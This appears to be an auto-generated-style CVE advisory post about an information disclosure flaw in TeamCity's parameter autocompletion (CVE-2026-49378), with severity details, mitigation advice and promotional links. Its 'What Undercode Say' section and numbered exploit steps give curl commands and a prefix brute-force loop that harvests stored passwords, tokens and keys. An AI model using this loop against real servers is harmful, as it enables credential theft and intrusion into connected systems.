JetBrains TeamCity, Information Disclosure, CVE-2026-49378 (Medium) -DC-Jun2026-96

Listen to this Post

Intro

In JetBrains TeamCity versions prior to 2026.1, an information disclosure vulnerability exists in the parameter autocompletion mechanism. The flaw allows low-privileged authenticated users to view credentials parameters (such as passwords, API tokens, and SSH keys) that were never meant to be exposed. The feature was intended to assist build configuration authors by suggesting available parameters, but it inadvertently returned the literal values of sensitive parameters – including those marked as “password” or “hidden” – when an attacker provided partial parameter names in autocomplete requests.
Specifically, when a user with “Project Developer” role (or any role that can view build configurations) typed a parameter name prefix into certain TeamCity web forms or REST API fields, the backend would respond with a list of matching parameter names along with their resolved values. Because no additional access control check was performed at the autocomplete endpoint, a malicious actor could iteratively guess parameter name prefixes and harvest all credentials stored in the build configuration.
The attack requires network access to the TeamCity server, low-privilege authentication (e.g., a standard developer account), and no user interaction beyond the attacker’s own requests. The CVSS v3.1 vector is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, yielding a base score of 4.3 (Medium).
Impact is limited to confidentiality of stored credentials, but those credentials often grant access to production systems, version control, artifact repositories, and cloud environments, making this a high-risk information leak in practice. JetBrains addressed the issue in TeamCity 2026.1 by filtering out any parameter marked as “password” from autocompletion results and by adding proper authorization checks at the endpoint.

DailyCVE Form:

Platform: JetBrains TeamCity
Version: before 2026.1
Vulnerability: Credentials parameter exposure
Severity: Medium (4.3)
date: 05/29/2026

Prediction: May 29, 2026

What Undercode Say:

Enumerate build configuration IDs (requires authenticated session token)
curl -X GET "https://teamcity.example.com/app/rest/buildTypes" \
-H "Authorization: Bearer $SESSION_TOKEN" \
-H "Accept: application/json" | jq '.buildType[].id'
Probe parameter autocompletion endpoint for sensitive values
Replace <confId> and <paramPrefix> accordingly
curl -X GET "https://teamcity.example.com/admin/editBuildType.html?init=autoCompleteParams&buildTypeId=<confId>&paramNamePrefix=<paramPrefix>" \
-H "Authorization: Bearer $SESSION_TOKEN"
Example: Dump all credentials by brute‑forcing prefixes (simplified PoC)
for prefix in "pass" "token" "secret" "key" "api"; do
curl -s "https://teamcity.example.com/admin/editBuildType.html?init=autoCompleteParams&buildTypeId=MyProject_Build&paramNamePrefix=$prefix" \
-H "Authorization: Bearer $TOKEN" | grep -E 'value="[^"]+"'
done

Analytics (Undercode Dashboard)

  • CVSS Base Score: 4.3 (Medium)
  • Attack Vector: Network
  • Privileges Required: Low
  • User Interaction: None
  • Confidentiality Impact: Low (partial disclosure of stored credentials)
  • CWE: 862 – Missing Authorization

Exploit:

  1. Obtain an authenticated session token (e.g., by logging in as a Project Developer).
  2. List all build configurations where the developer has view rights.
  3. For each configuration, call the vulnerable `/admin/editBuildType.html` endpoint with `paramNamePrefix` set to a short string (e.g., “p”, “t”, “s”).
  4. Collect all returned parameter values – the endpoint returns the actual stored value for each matched parameter, including those of type “password”.
  5. Repeat with different prefixes (dictionary / brute‑force) to retrieve all credentials stored in the build configuration.

Protection:

  • Upgrade to TeamCity 2026.1 or any later release that includes the fix.
  • If immediate upgrade is impossible, disable the parameter autocompletion feature via the `teamcity.parameters.autocomplete.disabled` internal property.
  • Restrict “Project Developer” role to only trusted users until upgrade.
  • Rotate all credentials that were stored in TeamCity prior to the upgrade.

Impact:

  • Unauthorized disclosure of passwords, API tokens, SSH private keys, and other sensitive parameters stored in build configurations.
  • Allows a low‑privileged attacker to pivot to production systems, code repositories, artifact servers, or cloud accounts that rely on those credentials.
  • Could lead to privilege escalation if leaked credentials belong to administrative or service accounts.
  • Violates compliance requirements (e.g., PCI‑DSS, HIPAA, SOC2) that mandate protection of secrets in CI/CD pipelines.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top